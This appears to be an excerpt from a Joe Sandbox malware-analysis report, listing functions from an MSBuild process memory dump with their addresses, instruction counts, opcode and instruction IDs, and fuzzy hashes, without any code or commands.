                                                                                                              • Instruction ID: 73bb182e08e68525521f546987bf1f9d87c4a055c02e1d3a67973d30fc4756df
                                                                                                              • Opcode Fuzzy Hash: bd50f6d224ce287f6e5c52c76d059a2202f69b2e721d2d58c11cb8247dad2c60
                                                                                                              • Instruction Fuzzy Hash: 55F0903191A6E19EE73ADBDCC044B21FBD49B00F24F09497AED8987D6AC774D880C651
                                                                                                              Function 011D0115 Relevance: .0, Instructions: 32COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 601b157b6822729f3337de0b1606c89b0b12641fe49622f92fe192466f062629
                                                                                                              • Instruction ID: d6c9b03bbc89af8801923928208f9f11fefd90986f9b244d1d090449f458d7af
                                                                                                              • Opcode Fuzzy Hash: 601b157b6822729f3337de0b1606c89b0b12641fe49622f92fe192466f062629
                                                                                                              • Instruction Fuzzy Hash: DAF0A3374157C54ACF3B5B3C78543D53F55A7A9414F09114DE4A057207C774C493C364
                                                                                                              Function 0114C5ED Relevance: .0, Instructions: 31COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8b62511683b39eac2af09282cf7db3243714aaefcfd45c2b7a7d30cc41242bbc
                                                                                                              • Instruction ID: 80de66fccd661da5809391f8399ef56b3026f311e9f6d59a65270313e697c543
                                                                                                              • Opcode Fuzzy Hash: 8b62511683b39eac2af09282cf7db3243714aaefcfd45c2b7a7d30cc41242bbc
                                                                                                              • Instruction Fuzzy Hash: FBF0BE715136519FE32A9B1CC148B117BD89B40EA4F09D575D40687722C774E880CAD1
                                                                                                              Function 01152619 Relevance: .0, Instructions: 31COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                              • Instruction ID: 4135b2b915858090d7a4c0b1214eab58f7b850c99e1887e28ffd62290c31c410
                                                                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                              • Instruction Fuzzy Hash: E5E09232300601ABE7659E598CC0F57776E9F92B14F040479BD045E251CBE29C1982A4
                                                                                                              Function 011A6030 Relevance: .0, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                              • Instruction ID: 918b3ee8d3b3edcb2a1048f2e899fe4f7ee7725a6ffbf7b7650e6d463f289df7
                                                                                                              • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                              • Instruction Fuzzy Hash: 67F06572144604DFE3298F09DA84F52BBF9EB05364F9AC025E6099B561D379EC80CBA4
                                                                                                              Function 01110710 Relevance: .0, Instructions: 28COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                              • Instruction ID: a6b823504a52083f38c12cf6d967f391377efb457f01329e0c19794ff0557fd8
                                                                                                              • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                              • Instruction Fuzzy Hash: 68F0E5396087459BDB1EDF19C040AE9BBA8FB59360B010064F8828B301D732E991CB51
                                                                                                              Function 011449D0 Relevance: .0, Instructions: 28COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                              • Instruction ID: 2cc050492517fcfaebb3343713875ac5f39f5f84e6eb5cef594ba56bcb7b2aa4
                                                                                                              • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                                              • Instruction Fuzzy Hash: 02E0D872244545ABD32D5E598800B66B7A6DBD0FA0F260439E2028B950DF70DC40C7D9
                                                                                                              Function 011E4164 Relevance: .0, Instructions: 27COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d84bf788fc41189e14413f9c78cab47947691743a686046a386a2e311ca5d38f
                                                                                                              • Instruction ID: 2d2beb6f19d42e99f5918bbe065902bdca80acb8b3e806ceb1a905e6efdd46d1
                                                                                                              • Opcode Fuzzy Hash: d84bf788fc41189e14413f9c78cab47947691743a686046a386a2e311ca5d38f
                                                                                                              • Instruction Fuzzy Hash: C2F0E535A25DA14FEB7AD7ACE148B5177E0AB50674F0E0554D400C7D12C334FC80C650
                                                                                                              Function 011B678E Relevance: .0, Instructions: 27COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                              • Instruction ID: 2b9f1c9433328a8b3225ad655b2bfed702e66239fa9805277c3c771f4e2792d3
                                                                                                              • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                              • Instruction Fuzzy Hash: E6E0DF73A00520BBDB2997998D41FDABFACDBA0EA4F150064F600E7094E630DE00C690
                                                                                                              Function 011E08C0 Relevance: .0, Instructions: 25COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                              • Instruction ID: c16ce1e6d943164a5ab7e56a7ae6a4c747fa3c6e9ba9b15e23b92406d17d2975
                                                                                                              • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                                              • Instruction Fuzzy Hash: 61E09B31B40B559BCB298A9DC144E53BBE8DF99664F15806DEA0547612C371F882C6D0
                                                                                                              Function 011125E0 Relevance: .0, Instructions: 23COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: d0690a8833344cf2700e4ae7c20cf524c12dd1bc02556c4ee9b19d3b7f9dccd7
                                                                                                              • Instruction ID: 9b1adc88dd09793b3b47ccdfe9e84aa1084900ce6030ab62cf315bd300782689
                                                                                                              • Opcode Fuzzy Hash: d0690a8833344cf2700e4ae7c20cf524c12dd1bc02556c4ee9b19d3b7f9dccd7
                                                                                                              • Instruction Fuzzy Hash: 5DE092321005549BC326BF29DD01F8ABB9AEB64768F114525F12557594CB34A820C7C4
                                                                                                              Function 011CA456 Relevance: .0, Instructions: 23COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                              • Instruction ID: a8fb7581661db41fa4372bb7d6a2cc151ad922fd96e543ca13c91ca523e1c2c0
                                                                                                              • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                              • Instruction Fuzzy Hash: 41E09231011611DFE73A6F2AD808B52BAE0BF60B15F188C2DE096024B0D77598D1CA80
                                                                                                              Function 01194000 Relevance: .0, Instructions: 22COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                              • Instruction ID: 449bcaa11da7b62e077b38967092a176098f5974d65e5690c176499ac2a2900e
                                                                                                              • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                              • Instruction Fuzzy Hash: 6FE0C2343003058FEB19CF19C140BA27BB6BFD5A10F28C068A9588F605EB32E843CB40
                                                                                                              Function 0110823B Relevance: .0, Instructions: 21COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                              • Instruction ID: e1750d17615a7f5dce358378889cc6c858981a52270b26106d7e6c589b15a54f
                                                                                                              • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                              • Instruction Fuzzy Hash: FBE08C32948A20EEDB3E2E19DC00B5176A5FB58B24F11482AE081060A4CBB5A8A2CA45
                                                                                                              Function 01112050 Relevance: .0, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ae55aef8fd825be6fd0c804d8b8de8baef50816b50feaf62ec2eb5ee262669a5
                                                                                                              • Instruction ID: c9da522b27d6354525c32aa606c0e287d50645997890e67d4fd9d41f0e2d8922
                                                                                                              • Opcode Fuzzy Hash: ae55aef8fd825be6fd0c804d8b8de8baef50816b50feaf62ec2eb5ee262669a5
                                                                                                              • Instruction Fuzzy Hash: 58E08C321004646BC216FA5DED10F4AB79AEBA9664F100221F15087698CB24AC11C794
                                                                                                              Function 01148A90 Relevance: .0, Instructions: 20COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                              • Instruction ID: 29d57d50dd4137037363db84b36df28d3a328a24078f7ba6acf1cdf496fdf021
                                                                                                              • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                              • Instruction Fuzzy Hash: 83E08633511A1487C72CDE58D511B7277A4EF45B20F19463EA61347780C674E544C795
                                                                                                              Function 0114E59C Relevance: .0, Instructions: 16COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                              • Instruction ID: 3b2971756907ba1a693d312c1689ee5ff1d082f87c264b0ee86af0e821ef8e99
                                                                                                              • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                              • Instruction Fuzzy Hash: 8ED0A932214620ABD736AA1CFC00FD333E9BB8C724F06045AF018C7050C364AC82CA84
                                                                                                              Function 0118E908 Relevance: .0, Instructions: 16COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                              • Instruction ID: fd5648ef6f9ef3e6a541e3a5420586660ea3987adf8459f538370d1a25fcab18
                                                                                                              • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                              • Instruction Fuzzy Hash: 6AE08C319116809BCF1AEF99C640F4ABBB5BB84B00F140014A4185B220C324A801CB40
                                                                                                              Function 0110A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                              • Instruction ID: 2de93241da5b2a7db88ec4686617ed40778292543849e64c4f142330031e89a8
                                                                                                              • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                              • Instruction Fuzzy Hash: 82D02232722030A3CB2E9A557800F636909AF84AA4F0A002D740A93840C2188C43C2E0
                                                                                                              Function 0114A830 Relevance: .0, Instructions: 14COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                              • Instruction ID: da188716c8a2492c5066b0a04ce3cd979bd12adda07898c4b55f3b919a40e0ae
                                                                                                              • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                              • Instruction Fuzzy Hash: 06D022370E010CBBCB119F62CC01F903BA8E768BA0F004020F504870A0C63AE860C580
                                                                                                              Function 0114CA24 Relevance: .0, Instructions: 14COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dd37459482208937a75df707545490fe9add49d8ac11c245a739181ea3cb3c64
                                                                                                              • Instruction ID: decfc2372e91184c44950ecfa1366b483eb07fce8c7e3bd52ce419765206bb25
                                                                                                              • Opcode Fuzzy Hash: dd37459482208937a75df707545490fe9add49d8ac11c245a739181ea3cb3c64
                                                                                                              • Instruction Fuzzy Hash: 77D092396569129BDF2EEF59CA14B6A7AB4EF18A40B904068E60192521E369D8228A90
                                                                                                              Function 011202A0 Relevance: .0, Instructions: 13COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                              • Instruction ID: 53013ed565374d5dcda911e4ac152479f37fb32911a30cef1b4b56e30a7091b3
                                                                                                              • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                              • Instruction Fuzzy Hash: 8ED09235212E80CFD61E8B0CC5A4B1533A4BB49B44F810591E401CBB22E728E990CA01
                                                                                                              Function 0114C700 Relevance: .0, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                              • Instruction ID: 5c7d0ddaebcec4dd730b4e313efcbfb95a6b0ebd7f4687287f63509ba83339c3
                                                                                                              • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                              • Instruction Fuzzy Hash: 7CC012322A0648AFC716AE99CD01F027BA9EBACB50F000022F2048B670C635E821EA84
                                                                                                              Function 01130310 Relevance: .0, Instructions: 11COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                              • Instruction ID: c887acd6cc7b9378af60930eb8cacb3fd45123eedcb3b6912c40b39870493e9b
                                                                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                              • Instruction Fuzzy Hash: 81D01236100248EFCB05DF45C890D9A776AFBD8710F108019FD19077108B31ED62DA50
                                                                                                              Function 01110750 Relevance: .0, Instructions: 9COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                              • Instruction ID: 2be73dc913ba6efa185504d2621d38c23c5d86030fc09917750c9bcdb8851c32
                                                                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                              • Instruction Fuzzy Hash: 05C04C797115458FCF19DB19D294F4977E4F744754F554890E805CB726E724E811CA10
                                                                                                              Function 01154340 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e55826096a860d0451678575cadaa51647d8c7cf9fb705641c3031003bf8495d
                                                                                                              • Instruction ID: 92c08792385d6606538c9ecd09df0ae8baf9cf6707b172cbed1785025db76160
                                                                                                              • Opcode Fuzzy Hash: e55826096a860d0451678575cadaa51647d8c7cf9fb705641c3031003bf8495d
                                                                                                              • Instruction Fuzzy Hash: 2C9002716059001291447158498454A4009A7E0301B55C011E4425554CCB158A665361
                                                                                                              Function 01154650 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 507bf84aa05c2a3af2d7a7bdccb56af74345c8cdc1330a53936d8385c073dae1
                                                                                                              • Instruction ID: 37530e721cccc9e516a7d33fffa01b138595e4681195c92690da2ce97c07ed8d
                                                                                                              • Opcode Fuzzy Hash: 507bf84aa05c2a3af2d7a7bdccb56af74345c8cdc1330a53936d8385c073dae1
                                                                                                              • Instruction Fuzzy Hash: AE9002A16016004241447158490440A6009A7E1301395C115A4555560CC71989659369
                                                                                                              Function 01152B80 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 413dfc0e2779e06700d30dcc74979bbff315abd7917e676e01fc3a89f7020127
                                                                                                              • Instruction ID: ff22fbf924ed3328a94445068b589356d82f2651107a383817ff2a024f43bf6a
                                                                                                              • Opcode Fuzzy Hash: 413dfc0e2779e06700d30dcc74979bbff315abd7917e676e01fc3a89f7020127
                                                                                                              • Instruction Fuzzy Hash: 0790027120150802D1087158490468A000997D0301F55C011AA025655ED76689A17231
                                                                                                              Function 01152BA0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 543bc13322e4a311ea0ef5f1604fdcccca63e862db86f319cc41773074d905f0
                                                                                                              • Instruction ID: af5edcec478ddaae847f07f175549355425201b14bbd45d51baac62a417fa0b7
                                                                                                              • Opcode Fuzzy Hash: 543bc13322e4a311ea0ef5f1604fdcccca63e862db86f319cc41773074d905f0
                                                                                                              • Instruction Fuzzy Hash: D190027160550802D1547158451474A000997D0301F55C011A4025654DC7568B6577A1
                                                                                                              Function 01152BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: db788e6666059082c519ba7a33846708609c823443010d6fa065b605aaf856fd
                                                                                                              • Instruction ID: 4885f2e8ff052a71de07e8439c21f405f82ec21eefdaaf047fb025a9360e37cc
                                                                                                              • Opcode Fuzzy Hash: db788e6666059082c519ba7a33846708609c823443010d6fa065b605aaf856fd
                                                                                                              • Instruction Fuzzy Hash: 6890027120150802D1847158450464E000997D1301F95C015A4026654DCB168B6977A1
                                                                                                              Function 01152BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
